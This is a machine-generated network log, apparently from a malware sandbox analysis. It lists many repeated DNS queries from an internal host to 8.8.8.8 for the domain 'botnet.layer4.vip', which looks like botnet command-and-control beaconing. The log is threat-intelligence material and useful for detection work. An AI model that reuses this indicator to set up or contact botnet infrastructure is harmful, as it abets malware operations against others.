                                  Apr 9, 2023 03:32:07.106997013 CEST192.168.2.238.8.8.80xafa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.131479025 CEST192.168.2.238.8.8.80xf591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.155772924 CEST192.168.2.238.8.8.80xf591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.180947065 CEST192.168.2.238.8.8.80xf591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.206051111 CEST192.168.2.238.8.8.80xf591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.230207920 CEST192.168.2.238.8.8.80xf591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.246201992 CEST192.168.2.238.8.8.80xaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.270908117 CEST192.168.2.238.8.8.80xaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.286820889 CEST192.168.2.238.8.8.80xaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.311662912 CEST192.168.2.238.8.8.80xaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.335830927 CEST192.168.2.238.8.8.80xaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.360311985 CEST192.168.2.238.8.8.80x8750Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.375920057 CEST192.168.2.238.8.8.80x8750Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.391792059 CEST192.168.2.238.8.8.80x8750Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.407685995 CEST192.168.2.238.8.8.80x8750Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.423305035 CEST192.168.2.238.8.8.80x8750Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.447489023 CEST192.168.2.238.8.8.80x2adbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.472629070 CEST192.168.2.238.8.8.80x2adbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.496704102 CEST192.168.2.238.8.8.80x2adbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.512204885 CEST192.168.2.238.8.8.80x2adbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.536259890 CEST192.168.2.238.8.8.80x2adbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.560852051 CEST192.168.2.238.8.8.80x9528Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.576657057 CEST192.168.2.238.8.8.80x9528Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.600714922 CEST192.168.2.238.8.8.80x9528Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.616199970 CEST192.168.2.238.8.8.80x9528Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.632124901 CEST192.168.2.238.8.8.80x9528Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.656621933 CEST192.168.2.238.8.8.80x4bb5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.672153950 CEST192.168.2.238.8.8.80x4bb5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.687685013 CEST192.168.2.238.8.8.80x4bb5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.711740971 CEST192.168.2.238.8.8.80x4bb5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.736182928 CEST192.168.2.238.8.8.80x4bb5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.760401964 CEST192.168.2.238.8.8.80xabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.776278973 CEST192.168.2.238.8.8.80xabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.791718960 CEST192.168.2.238.8.8.80xabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.816656113 CEST192.168.2.238.8.8.80xabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.841013908 CEST192.168.2.238.8.8.80xabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.865449905 CEST192.168.2.238.8.8.80xa91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.889816999 CEST192.168.2.238.8.8.80xa91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.905755997 CEST192.168.2.238.8.8.80xa91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.930358887 CEST192.168.2.238.8.8.80xa91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.946192980 CEST192.168.2.238.8.8.80xa91aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.962171078 CEST192.168.2.238.8.8.80xe9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.986596107 CEST192.168.2.238.8.8.80xe9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.002532005 CEST192.168.2.238.8.8.80xe9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.026654959 CEST192.168.2.238.8.8.80xe9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.051090002 CEST192.168.2.238.8.8.80xe9d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.067053080 CEST192.168.2.238.8.8.80x1f02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.082573891 CEST192.168.2.238.8.8.80x1f02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.098367929 CEST192.168.2.238.8.8.80x1f02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.122456074 CEST192.168.2.238.8.8.80x1f02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.138261080 CEST192.168.2.238.8.8.80x1f02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.162472963 CEST192.168.2.238.8.8.80xc3d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.178101063 CEST192.168.2.238.8.8.80xc3d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.202503920 CEST192.168.2.238.8.8.80xc3d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.218456030 CEST192.168.2.238.8.8.80xc3d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.242548943 CEST192.168.2.238.8.8.80xc3d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.258465052 CEST192.168.2.238.8.8.80x8f4cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.274358034 CEST192.168.2.238.8.8.80x8f4cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.289899111 CEST192.168.2.238.8.8.80x8f4cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.314006090 CEST192.168.2.238.8.8.80x8f4cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.329952955 CEST192.168.2.238.8.8.80x8f4cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.345882893 CEST192.168.2.238.8.8.80x3c97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.369995117 CEST192.168.2.238.8.8.80x3c97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.394032955 CEST192.168.2.238.8.8.80x3c97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.418585062 CEST192.168.2.238.8.8.80x3c97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.442784071 CEST192.168.2.238.8.8.80x3c97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.466908932 CEST192.168.2.238.8.8.80x54b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.482489109 CEST192.168.2.238.8.8.80x54b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.498027086 CEST192.168.2.238.8.8.80x54b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.522103071 CEST192.168.2.238.8.8.80x54b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.546520948 CEST192.168.2.238.8.8.80x54b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.571026087 CEST192.168.2.238.8.8.80x46efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.595397949 CEST192.168.2.238.8.8.80x46efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.610868931 CEST192.168.2.238.8.8.80x46efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.626338959 CEST192.168.2.238.8.8.80x46efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.650434971 CEST192.168.2.238.8.8.80x46efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.674860954 CEST192.168.2.238.8.8.80x45d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.699207067 CEST192.168.2.238.8.8.80x45d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.715099096 CEST192.168.2.238.8.8.80x45d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.730762005 CEST192.168.2.238.8.8.80x45d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.746340036 CEST192.168.2.238.8.8.80x45d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.770472050 CEST192.168.2.238.8.8.80x5201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.794573069 CEST192.168.2.238.8.8.80x5201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.818840027 CEST192.168.2.238.8.8.80x5201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.834553003 CEST192.168.2.238.8.8.80x5201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.850441933 CEST192.168.2.238.8.8.80x5201Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.866065979 CEST192.168.2.238.8.8.80x56e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.890229940 CEST192.168.2.238.8.8.80x56e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.914573908 CEST192.168.2.238.8.8.80x56e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.930186033 CEST192.168.2.238.8.8.80x56e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.946044922 CEST192.168.2.238.8.8.80x56e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.970479965 CEST192.168.2.238.8.8.80x431dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.986330032 CEST192.168.2.238.8.8.80x431dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.010418892 CEST192.168.2.238.8.8.80x431dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.026526928 CEST192.168.2.238.8.8.80x431dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.050688028 CEST192.168.2.238.8.8.80x431dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.066627026 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.082535028 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.106604099 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.130819082 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.154930115 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.179451942 CEST192.168.2.238.8.8.80x42bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.194999933 CEST192.168.2.238.8.8.80x42bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.210654974 CEST192.168.2.238.8.8.80x42bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.235153913 CEST192.168.2.238.8.8.80x42bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.250731945 CEST192.168.2.238.8.8.80x42bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.266544104 CEST192.168.2.238.8.8.80x4614Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.282193899 CEST192.168.2.238.8.8.80x4614Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.297698021 CEST192.168.2.238.8.8.80x4614Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.322094917 CEST192.168.2.238.8.8.80x4614Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.337894917 CEST192.168.2.238.8.8.80x4614Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.353405952 CEST192.168.2.238.8.8.80x102aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.369301081 CEST192.168.2.238.8.8.80x102aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.385190964 CEST192.168.2.238.8.8.80x102aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.400743008 CEST192.168.2.238.8.8.80x102aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.424865007 CEST192.168.2.238.8.8.80x102aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.449301004 CEST192.168.2.238.8.8.80x8ed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.464853048 CEST192.168.2.238.8.8.80x8ed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.488970995 CEST192.168.2.238.8.8.80x8ed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.504513979 CEST192.168.2.238.8.8.80x8ed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.529058933 CEST192.168.2.238.8.8.80x8ed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.544692039 CEST192.168.2.238.8.8.80x74a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.569175959 CEST192.168.2.238.8.8.80x74a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.593554974 CEST192.168.2.238.8.8.80x74a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.618038893 CEST192.168.2.238.8.8.80x74a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.642160892 CEST192.168.2.238.8.8.80x74a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.658160925 CEST192.168.2.238.8.8.80x4028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.674098969 CEST192.168.2.238.8.8.80x4028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.689697981 CEST192.168.2.238.8.8.80x4028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.714148045 CEST192.168.2.238.8.8.80x4028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.730017900 CEST192.168.2.238.8.8.80x4028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.745955944 CEST192.168.2.238.8.8.80x13bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.761523008 CEST192.168.2.238.8.8.80x13bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.786026955 CEST192.168.2.238.8.8.80x13bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.810141087 CEST192.168.2.238.8.8.80x13bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.836718082 CEST192.168.2.238.8.8.80x13bcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.852355003 CEST192.168.2.238.8.8.80x7bc4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.868053913 CEST192.168.2.238.8.8.80x7bc4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.883554935 CEST192.168.2.238.8.8.80x7bc4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.899461031 CEST192.168.2.238.8.8.80x7bc4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.923887968 CEST192.168.2.238.8.8.80x7bc4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.948204994 CEST192.168.2.238.8.8.80xe811Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.972745895 CEST192.168.2.238.8.8.80xe811Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.988733053 CEST192.168.2.238.8.8.80xe811Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.013341904 CEST192.168.2.238.8.8.80xe811Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.029552937 CEST192.168.2.238.8.8.80xe811Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.045247078 CEST192.168.2.238.8.8.80x71faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.069319010 CEST192.168.2.238.8.8.80x71faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.093411922 CEST192.168.2.238.8.8.80x71faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.117846966 CEST192.168.2.238.8.8.80x71faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.133394957 CEST192.168.2.238.8.8.80x71faStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.149344921 CEST192.168.2.238.8.8.80x1e36Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.173614025 CEST192.168.2.238.8.8.80x1e36Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.189502954 CEST192.168.2.238.8.8.80x1e36Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.205322981 CEST192.168.2.238.8.8.80x1e36Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.221225023 CEST192.168.2.238.8.8.80x1e36Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.245701075 CEST192.168.2.238.8.8.80x481eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.270129919 CEST192.168.2.238.8.8.80x481eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.285689116 CEST192.168.2.238.8.8.80x481eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.310177088 CEST192.168.2.238.8.8.80x481eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.334379911 CEST192.168.2.238.8.8.80x481eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.358846903 CEST192.168.2.238.8.8.80xddcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.374528885 CEST192.168.2.238.8.8.80xddcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.390042067 CEST192.168.2.238.8.8.80xddcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.414109945 CEST192.168.2.238.8.8.80xddcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.438246012 CEST192.168.2.238.8.8.80xddcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.462801933 CEST192.168.2.238.8.8.80x37cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.486948013 CEST192.168.2.238.8.8.80x37cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.511332989 CEST192.168.2.238.8.8.80x37cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.526932955 CEST192.168.2.238.8.8.80x37cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.542748928 CEST192.168.2.238.8.8.80x37cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.558276892 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.582367897 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.597939968 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.622029066 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.646359921 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.662286043 CEST192.168.2.238.8.8.80xc92dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.677850962 CEST192.168.2.238.8.8.80xc92dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.693753004 CEST192.168.2.238.8.8.80xc92dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.717880964 CEST192.168.2.238.8.8.80xc92dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.733464956 CEST192.168.2.238.8.8.80xc92dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.749419928 CEST192.168.2.238.8.8.80x1729Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.773840904 CEST192.168.2.238.8.8.80x1729Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.797950029 CEST192.168.2.238.8.8.80x1729Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.818682909 CEST192.168.2.238.8.8.80x1729Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.844445944 CEST192.168.2.238.8.8.80x1729Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.860161066 CEST192.168.2.238.8.8.80x8a5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.884315968 CEST192.168.2.238.8.8.80x8a5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.899856091 CEST192.168.2.238.8.8.80x8a5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.915326118 CEST192.168.2.238.8.8.80x8a5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.931109905 CEST192.168.2.238.8.8.80x8a5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.955585957 CEST192.168.2.238.8.8.80xe58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.971417904 CEST192.168.2.238.8.8.80xe58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.995553017 CEST192.168.2.238.8.8.80xe58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.011146069 CEST192.168.2.238.8.8.80xe58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.035608053 CEST192.168.2.238.8.8.80xe58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.051664114 CEST192.168.2.238.8.8.80x9891Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.075989962 CEST192.168.2.238.8.8.80x9891Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
